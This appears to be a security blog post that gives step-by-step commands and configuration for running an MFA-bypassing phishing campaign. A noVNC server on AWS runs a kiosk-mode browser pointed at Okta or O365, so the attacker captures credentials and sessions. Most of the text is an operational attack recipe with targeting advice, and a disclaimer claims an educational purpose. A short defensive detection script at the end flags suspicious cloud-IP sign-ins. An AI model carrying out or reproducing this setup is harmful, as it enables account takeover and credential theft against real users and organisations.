MFA Phishing using noVNC and AWS

psychsecurity
3 min read · Feb 16, 2023


Disclaimer: The information provided on this blog is for educational and informational purposes only. The author does not support or condone any illegal or unethical behaviour, including but not limited to hacking. By accessing this blog, you agree to use the information solely for lawful and ethical purposes.

As Identity and Access Management (IdAM) solutions actively attempt to detect multi-factor authentication (MFA) based phishing tools like Evilginx2, I began researching alternatives and came across an excellent blog article from MrD0x at https://mrd0x.com/bypass-2fa-using-novnc/. All credit for this technique goes to him. This article provides guidance on how to set up a working campaign using AWS.

The idea behind this technique is to phish a user into visiting a noVNC server that you control as an attacker, running a browser in kiosk mode. The user then accesses a legitimate service, such as Okta or O365, and enters their credentials, including MFA. Following this, we can either kick the user and take over the session, keylog, or proxy all traffic.

EC2 Instance

Select an Ubuntu 22.04 LTS AMI with the t2.medium instance type, as noVNC is graphics-intensive.

Security group

Enable inbound rules for 22/tcp (to SSH into the instance) and 443/tcp (to access the noVNC server).

DNS Setup using Route53

Register your phishing domain and, under the hosted zone, create an A record pointing to the IP of the EC2 instance you are running.

Set up certificate for TLS

sudo apt install certbot
sudo certbot certonly --standalone -d yourphishingdomain.com

Enter all the details to generate the certificate.

Make a note of where the certificate and key are stored, usually /etc/letsencrypt/live/yourphishingdomain.com/.

Install TigerVNC

sudo apt update
sudo apt install tigervnc-standalone-server tigervnc-xorg-extension tigervnc-viewer
sudo apt install ubuntu-gnome-desktop
sudo systemctl enable gdm
sudo systemctl start gdm

Install dbus-x11

sudo apt install dbus-x11

There is a known blank-screen issue, which can be fixed by uncommenting the line WaylandEnable=false in /etc/gdm3/custom.conf.

Set up VNC password

vncpasswd

Create a really long password with random characters. This will come in handy later.

Create ~/.vnc/xstartup

#!/bin/sh
# Start GNOME 3 desktop
[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r "$HOME/.Xresources" ] && xrdb "$HOME/.Xresources"
vncconfig -iconic &
dbus-launch --exit-with-session gnome-session

Change permissions

chmod +x ~/.vnc/xstartup

Run vncserver

vncserver -depth 32 -geometry 2000x1000

Set up noVNC

git clone https://github.com/novnc/noVNC.git

Edit ./noVNC/vnc.html to modify the page title and make the following changes to remove the control bar and make the loading page white:

<div id="noVNC_control_bar_anchor" class="noVNC_vcenter" style="display:none;">
<div id="noVNC_status" style="display:none"></div>
<div id="noVNC_transition" style="background-color:white;color:white">

Copy the certificate and key previously generated to your home folder and then run:

sudo ./noVNC/utils/novnc_proxy --listen 443 --vnc 0.0.0.0:5901 --cert /home/ubuntu/cert/fullchain.pem --key /home/ubuntu/cert/privkey.pem

Install Firefox

wget -O ~/FirefoxSetup.tar.bz2 "https://download.mozilla.org/?product=firefox-latest&os=linux64"
sudo tar xjf ~/FirefoxSetup.tar.bz2 -C /opt/
sudo ln -s /opt/firefox/firefox /usr/bin/firefox

First, confirm that your setup is complete by accessing the noVNC server at https://yourphishingdomain.com/vnc.html?autoconnect=true&password=reallyreallylongpasswordwithrandomcharacters&resize=remote

Next, launch Firefox and set the homepage to the URL you want the user to visit (such as https://companyname.okta.com or https://login.microsoftonline.com).

Make sure to disable auto screen lock.

Close Firefox and restart it in kiosk mode.

firefox --kiosk

You can now share the phishing link with your target user.

As the attacker, you can monitor the user’s session in your own browser, but be careful when clicking your mouse. Remember that the user has remote access to the machine, so ensure that appropriate lockdown steps have been taken and that the user cannot escape kiosk mode. This technique is best suited for spear phishing a small number of users and is not recommended for larger campaigns. If you are targeting multiple users, consider running multiple VNC servers on different ports.
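From the defender's side, the telltale of this technique is that the victim's credentials and MFA are entered by the Firefox instance running on the attacker's EC2 host, so the identity provider records a successful MFA sign-in from a datacenter IP with a Linux/Firefox fingerprint the user has never presented before. The detection sketch below is an added example, not part of the original post; the simplified log format, the user records and the cloud prefix list are all constructed placeholders.

```python
"""Flag MFA sign-ins that look like a browser-in-the-middle (noVNC-style)
session: a successful MFA from a cloud/datacenter IP combined with an
OS/browser pair the user has never used before."""
import ipaddress
import json
from collections import defaultdict

# Constructed stand-in for a cloud provider's published prefix list. In
# practice load the real list, e.g. https://ip-ranges.amazonaws.com/ip-ranges.json.
CLOUD_PREFIXES = [ipaddress.ip_network(p) for p in ("203.0.113.0/24", "198.51.100.0/24")]

# Constructed sign-in events in a simplified IdP log shape (not a vendor format).
# Alice normally signs in from Windows/Chrome; on 2023-02-16 her MFA success
# arrives from a cloud IP with a Linux/Firefox fingerprint.
SIGNIN_LOG = """
{"user":"alice","ts":"2023-02-10T08:01:00Z","ip":"192.0.2.10","os":"Windows","browser":"Chrome","mfa":"success"}
{"user":"alice","ts":"2023-02-13T08:03:00Z","ip":"192.0.2.10","os":"Windows","browser":"Chrome","mfa":"success"}
{"user":"alice","ts":"2023-02-16T09:12:00Z","ip":"203.0.113.45","os":"Linux","browser":"Firefox","mfa":"success"}
{"user":"bob","ts":"2023-02-16T09:15:00Z","ip":"198.51.100.7","os":"Linux","browser":"Firefox","mfa":"success"}
{"user":"bob","ts":"2023-02-16T10:15:00Z","ip":"198.51.100.7","os":"Linux","browser":"Firefox","mfa":"success"}
"""


def is_cloud_ip(ip):
    """True if the address falls inside any known cloud prefix."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUD_PREFIXES)


def parse_events(raw):
    """One JSON object per line; blank lines are skipped."""
    return [json.loads(line) for line in raw.strip().splitlines() if line.strip()]


def find_suspicious_signins(events):
    """Return MFA successes from a cloud IP whose OS/browser pair the user
    had not presented in any earlier event (a user with no history is
    flagged on a first cloud-IP sign-in, which is the conservative choice)."""
    seen = defaultdict(set)
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        fp = (ev["os"], ev["browser"])
        new_device = fp not in seen[ev["user"]]
        if ev["mfa"] == "success" and is_cloud_ip(ev["ip"]) and new_device:
            hits.append(ev)
        seen[ev["user"]].add(fp)
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_signins(parse_events(SIGNIN_LOG)):
        print("suspicious MFA sign-in:", hit["user"], hit["ts"], hit["ip"])
```

Against the constructed log this flags Alice's Linux/Firefox sign-in from the cloud range and Bob's first cloud-IP sign-in, while Bob's repeat from the same fingerprint is not re-flagged.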
